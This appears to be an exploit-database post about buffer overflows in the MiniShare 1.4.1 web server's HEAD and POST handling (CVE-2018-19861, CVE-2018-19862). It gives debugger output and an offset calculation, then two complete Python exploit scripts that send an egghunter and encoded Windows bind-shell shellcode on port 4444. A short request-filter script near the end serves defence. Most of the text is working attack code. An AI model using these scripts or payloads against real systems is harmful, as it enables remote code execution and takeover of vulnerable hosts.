Hi!!! playing in 2006.... I have adapted the exploit to python

Not only the GET method is vulnerable to BOF (CVE-2004-2271). The HEAD and POST
methods are also vulnerable. The difference is minimal, and all three are exploited
in the same way. The only difference is one byte of method-name length: GET is 3
characters, HEAD and POST are 4.

-------------------------------------------------------------------

EAX 00000000
ECX 77C3EF3B msvcrt.77C3EF3B
EDX 00F14E38
EBX 43346843
ESP 01563908 ASCII "6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co HTTP/1.1"
EBP 0156BB90
ESI 00000001
EDI 01565B68
EIP 68433568
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 1 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDD000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010216 (NO,NB,NE,A,NS,PE,GE,G)
ST0 empty
ST1 empty
ST2 empty
ST3 empty
ST4 empty
ST5 empty
ST6 empty
ST7 empty
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1

------------------------------------------------------------------------------

Only 210 bytes are available at ESP for the shellcode
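As an added example (not part of the original post), the following reproduces the arithmetic behind the offsets used below from the register dump above: EIP 68433568 and the text at ESP are the values shown in the dump, and the request line is assumed to have been a 2000-byte Metasploit-style cyclic pattern.

```python
import string
import struct

# Constructed from the values in the dump above: EIP held 0x68433568 and
# ESP pointed at "6Ch7Ch8Ch9Ci0Ci1..."; the request line was 2000 bytes (assumed).
CRASH_EIP = 0x68433568
CRASH_ESP_ASCII = "6Ch7Ch8Ch9Ci0Ci1"
REQUEST_LEN = 2000


def cyclic_pattern(length):
    """Metasploit pattern_create-style text: Aa0Aa1...Az9Ba0..., digit fastest."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if 3 * len(out) >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def register_to_ascii(value):
    """A 32-bit register value as the 4 little-endian bytes it was read from."""
    return struct.pack("<I", value).decode("ascii")


def pattern_offset(value, length=REQUEST_LEN):
    """Offset of a register's 4 bytes inside the pattern, or -1 if not found."""
    return cyclic_pattern(length).find(register_to_ascii(value))


def esp_offset(esp_ascii, length=REQUEST_LEN):
    """Offset inside the pattern of the text found at ESP (first 12 chars)."""
    return cyclic_pattern(length).find(esp_ascii[:12])


def space_after_esp(esp_ascii, total=REQUEST_LEN):
    """Bytes of the request that lie at and beyond ESP: the room left there."""
    return total - esp_offset(esp_ascii, total)


if __name__ == "__main__":
    eip_off = pattern_offset(CRASH_EIP)        # 1786: the "A" * 1786 used below
    esp_off = esp_offset(CRASH_ESP_ASCII)      # 1790: right after the 4 EIP bytes
    print("EIP overwritten by bytes at offset", eip_off)
    print("ESP points at offset", esp_off, "->",
          space_after_esp(CRASH_ESP_ASCII), "bytes left at ESP")
```

The 210 bytes quoted above is exactly 2000 minus the ESP offset, which is why the bind shell does not fit there and an egghunter is used instead.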

------------------------------------------------------------------------------

Bad chars: \x00, \x0d

------------------------------------------------------------------------------

>findjmp kernel32.dll esp - XP SP 3 English

Scanning kernel32.dll for code useable with the esp register
0x7C809F83 call esp
0x7C8369E0 call esp
0x7C83C2C5 push esp - ret
0x7C87641B call esp


<!--
# Exploit Title: Buffer overflow in MiniShare 1.4.1 HEAD method.
# Date: 05-12-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://minishare.sourceforge.net/
# Software Link: http://minishare.sourceforge.net/
# Version: Minishare v1.4.1
# Tested on: Windows
# CVE : CVE-2018-19861
# Category: exploit

1. Description

Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to
execute arbitrary code via a long HTTP HEAD request.


2. Proof of Concept

Exploit:

#!/usr/bin/env python2
import socket
import struct

# Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to
# execute arbitrary code via a long HTTP HEAD request - by Rafa
# CVE: CVE-2018-19861
# Via egghunter, because only 210 bytes are available at ESP for the shellcode.
# Project Home Page (MiniShare) - http://minishare.sourceforge.net/
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = "127.0.0.1"
port = 80

# 32-byte egghunter - egg = "r4f4" = \x72\x34\x66\x34
egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
             "\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=4444 -b "\x00\x0d" -f c
# Found 10 compatible encoders
# Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
# x86/shikata_ga_nai succeeded with size 355 (iteration=0)
# x86/shikata_ga_nai chosen with final size 355
# Payload size: 355 bytes
# Final size of c file: 1516 bytes
# unsigned char buf[] =
# The egg is doubled ("r4f4r4f4") so the egghunter recognises the start of the payload.
shellcode = ("r4f4r4f4" +
             "\xda\xd4\xb8\xda\xe7\x1b\xca\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
             "\x53\x83\xea\xfc\x31\x42\x13\x03\x98\xf4\xf9\x3f\xe0\x13\x7f"
             "\xbf\x18\xe4\xe0\x49\xfd\xd5\x20\x2d\x76\x45\x91\x25\xda\x6a"
             "\x5a\x6b\xce\xf9\x2e\xa4\xe1\x4a\x84\x92\xcc\x4b\xb5\xe7\x4f"
             "\xc8\xc4\x3b\xaf\xf1\x06\x4e\xae\x36\x7a\xa3\xe2\xef\xf0\x16"
             "\x12\x9b\x4d\xab\x99\xd7\x40\xab\x7e\xaf\x63\x9a\xd1\xbb\x3d"
             "\x3c\xd0\x68\x36\x75\xca\x6d\x73\xcf\x61\x45\x0f\xce\xa3\x97"
             "\xf0\x7d\x8a\x17\x03\x7f\xcb\x90\xfc\x0a\x25\xe3\x81\x0c\xf2"
             "\x99\x5d\x98\xe0\x3a\x15\x3a\xcc\xbb\xfa\xdd\x87\xb0\xb7\xaa"
             "\xcf\xd4\x46\x7e\x64\xe0\xc3\x81\xaa\x60\x97\xa5\x6e\x28\x43"
             "\xc7\x37\x94\x22\xf8\x27\x77\x9a\x5c\x2c\x9a\xcf\xec\x6f\xf3"
             "\x3c\xdd\x8f\x03\x2b\x56\xfc\x31\xf4\xcc\x6a\x7a\x7d\xcb\x6d"
             "\x7d\x54\xab\xe1\x80\x57\xcc\x28\x47\x03\x9c\x42\x6e\x2c\x77"
             "\x92\x8f\xf9\xe2\x9a\x36\x52\x11\x67\x88\x02\x95\xc7\x61\x49"
             "\x1a\x38\x91\x72\xf0\x51\x3a\x8f\xfb\x4c\xe7\x06\x1d\x04\x07"
             "\x4f\xb5\xb0\xe5\xb4\x0e\x27\x15\x9f\x26\xcf\x5e\xc9\xf1\xf0"
             "\x5e\xdf\x55\x66\xd5\x0c\x62\x97\xea\x18\xc2\xc0\x7d\xd6\x83"
             "\xa3\x1c\xe7\x89\x53\xbc\x7a\x56\xa3\xcb\x66\xc1\xf4\x9c\x59"
             "\x18\x90\x30\xc3\xb2\x86\xc8\x95\xfd\x02\x17\x66\x03\x8b\xda"
             "\xd2\x27\x9b\x22\xda\x63\xcf\xfa\x8d\x3d\xb9\xbc\x67\x8c\x13"
             "\x17\xdb\x46\xf3\xee\x17\x59\x85\xee\x7d\x2f\x69\x5e\x28\x76"
             "\x96\x6f\xbc\x7e\xef\x8d\x5c\x80\x3a\x16\x6c\xcb\x66\x3f\xe5"
             "\x92\xf3\x7d\x68\x25\x2e\x41\x95\xa6\xda\x3a\x62\xb6\xaf\x3f"
             "\x2e\x70\x5c\x32\x3f\x15\x62\xe1\x40\x3c")

# findjmp kernel32.dll esp - WinXP SP3 English
# 0x7C809F83 call esp
ret = struct.pack("<I", 0x7C809F83)

nops = "\x90" * 16

# 1786 bytes to reach EIP, then the return address, a NOP sled and the egghunter;
# the "C" padding keeps the request line at 2000 bytes.
junk = ("A" * 1786 + ret + nops + egghunter +
        "C" * (2000 - 1786 - 4 - 16 - len(egghunter)))

try:
    print "Sending exploit..."
    connection.connect((host, port))
    request = ("HEAD " + junk + " HTTP/1.1\r\n"
               "Host: " + shellcode + "\r\n\r\n")

    connection.send(request)
    connection.close()
    print "Exploit sent, %d bytes" % len(request)
except socket.error:
    print "Connection error"



3. Solution:

This product is deprecated

-->


<!--
# Exploit Title: Buffer overflow in MiniShare 1.4.1 POST method.
# Date: 05-12-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://minishare.sourceforge.net/
# Software Link: http://minishare.sourceforge.net/
# Version: Minishare v1.4.1
# Tested on: Windows
# CVE : CVE-2018-19862
# Category: exploit

1. Description

Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to
execute arbitrary code via a long HTTP POST request.


2. Proof of Concept

Exploit:

#!/usr/bin/env python2
import socket
import struct

# Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to
# execute arbitrary code via a long HTTP POST request - by Rafa
# CVE: CVE-2018-19862
# Via egghunter, because only 210 bytes are available at ESP for the shellcode.
# Project Home Page (MiniShare) - http://minishare.sourceforge.net/
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = "127.0.0.1"
port = 80

# 32-byte egghunter - egg = "r4f4" = \x72\x34\x66\x34
egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
             "\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=4444 -b "\x00\x0d" -f c
# Found 10 compatible encoders
# Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
# x86/shikata_ga_nai succeeded with size 355 (iteration=0)
# x86/shikata_ga_nai chosen with final size 355
# Payload size: 355 bytes
# Final size of c file: 1516 bytes
# unsigned char buf[] =
# The egg is doubled ("r4f4r4f4") so the egghunter recognises the start of the payload.
shellcode = ("r4f4r4f4" +
             "\xda\xd4\xb8\xda\xe7\x1b\xca\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
             "\x53\x83\xea\xfc\x31\x42\x13\x03\x98\xf4\xf9\x3f\xe0\x13\x7f"
             "\xbf\x18\xe4\xe0\x49\xfd\xd5\x20\x2d\x76\x45\x91\x25\xda\x6a"
             "\x5a\x6b\xce\xf9\x2e\xa4\xe1\x4a\x84\x92\xcc\x4b\xb5\xe7\x4f"
             "\xc8\xc4\x3b\xaf\xf1\x06\x4e\xae\x36\x7a\xa3\xe2\xef\xf0\x16"
             "\x12\x9b\x4d\xab\x99\xd7\x40\xab\x7e\xaf\x63\x9a\xd1\xbb\x3d"
             "\x3c\xd0\x68\x36\x75\xca\x6d\x73\xcf\x61\x45\x0f\xce\xa3\x97"
             "\xf0\x7d\x8a\x17\x03\x7f\xcb\x90\xfc\x0a\x25\xe3\x81\x0c\xf2"
             "\x99\x5d\x98\xe0\x3a\x15\x3a\xcc\xbb\xfa\xdd\x87\xb0\xb7\xaa"
             "\xcf\xd4\x46\x7e\x64\xe0\xc3\x81\xaa\x60\x97\xa5\x6e\x28\x43"
             "\xc7\x37\x94\x22\xf8\x27\x77\x9a\x5c\x2c\x9a\xcf\xec\x6f\xf3"
             "\x3c\xdd\x8f\x03\x2b\x56\xfc\x31\xf4\xcc\x6a\x7a\x7d\xcb\x6d"
             "\x7d\x54\xab\xe1\x80\x57\xcc\x28\x47\x03\x9c\x42\x6e\x2c\x77"
             "\x92\x8f\xf9\xe2\x9a\x36\x52\x11\x67\x88\x02\x95\xc7\x61\x49"
             "\x1a\x38\x91\x72\xf0\x51\x3a\x8f\xfb\x4c\xe7\x06\x1d\x04\x07"
             "\x4f\xb5\xb0\xe5\xb4\x0e\x27\x15\x9f\x26\xcf\x5e\xc9\xf1\xf0"
             "\x5e\xdf\x55\x66\xd5\x0c\x62\x97\xea\x18\xc2\xc0\x7d\xd6\x83"
             "\xa3\x1c\xe7\x89\x53\xbc\x7a\x56\xa3\xcb\x66\xc1\xf4\x9c\x59"
             "\x18\x90\x30\xc3\xb2\x86\xc8\x95\xfd\x02\x17\x66\x03\x8b\xda"
             "\xd2\x27\x9b\x22\xda\x63\xcf\xfa\x8d\x3d\xb9\xbc\x67\x8c\x13"
             "\x17\xdb\x46\xf3\xee\x17\x59\x85\xee\x7d\x2f\x69\x5e\x28\x76"
             "\x96\x6f\xbc\x7e\xef\x8d\x5c\x80\x3a\x16\x6c\xcb\x66\x3f\xe5"
             "\x92\xf3\x7d\x68\x25\x2e\x41\x95\xa6\xda\x3a\x62\xb6\xaf\x3f"
             "\x2e\x70\x5c\x32\x3f\x15\x62\xe1\x40\x3c")

# findjmp kernel32.dll esp - WinXP SP3 English
# 0x7C809F83 call esp
ret = struct.pack("<I", 0x7C809F83)

nops = "\x90" * 16

# 1786 bytes to reach EIP, then the return address, a NOP sled and the egghunter;
# the "C" padding keeps the request line at 2000 bytes.
junk = ("A" * 1786 + ret + nops + egghunter +
        "C" * (2000 - 1786 - 4 - 16 - len(egghunter)))

try:
    print "Sending exploit..."
    connection.connect((host, port))

    request = ("POST " + junk + " HTTP/1.1\r\n"
               "Host: " + shellcode + "\r\n\r\n")

    connection.send(request)
    connection.close()
    print "Exploit sent, %d bytes" % len(request)
except socket.error:
    print "Connection error"



3. Solution:

This product is deprecated

-->
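Since the vendor offers no fix, the practical defence is to keep such requests from reaching the server. The following is an added example (not from the advisories above): a request-shape check that a reverse proxy or IDS rule could apply in front of a legacy server like MiniShare. The thresholds are assumptions; the request-target length and the binary Host header match the shape of the exploits above.

```python
# Added example, not from the advisories: flag the request shape the exploits
# above rely on (a ~2000-byte request-target on GET/HEAD/POST and a Host header
# carrying raw bytes). Thresholds are assumptions, tune them for your site.
MAX_TARGET_LEN = 1024        # assumption: well below the 2000 bytes used above
MAX_HEADER_VALUE_LEN = 512   # assumption
WATCHED_METHODS = (b"GET", b"HEAD", b"POST")   # the three methods named above


def check_request(raw):
    """Return a list of findings for one raw HTTP request; [] means unremarkable."""
    findings = []
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3:
        return ["malformed request line"]
    method, target, _version = parts
    if method in WATCHED_METHODS and len(target) > MAX_TARGET_LEN:
        findings.append("%s request-target of %d bytes"
                        % (method.decode("ascii"), len(target)))
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if not sep:
            findings.append("malformed header line")
            continue
        label = name.strip().decode("ascii", "replace")
        value = value.strip()
        if len(value) > MAX_HEADER_VALUE_LEN:
            findings.append("oversized %s header (%d bytes)" % (label, len(value)))
        # Header values are supposed to be printable ASCII; shellcode is not.
        if any(byte < 0x20 or byte > 0x7e for byte in value):
            findings.append("non-printable bytes in %s header" % label)
    return findings


# Constructed samples: an ordinary request and one with the shape of the
# exploits above (long target, binary Host value) but no real payload.
BENIGN = b"HEAD /index.html HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n"
SUSPECT = (b"HEAD " + b"A" * 2000 + b" HTTP/1.1\r\n" +
           b"Host: r4f4r4f4" + bytes(range(0x80, 0x90)) + b"\r\n\r\n")

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, check_request(sample) or "no findings")
```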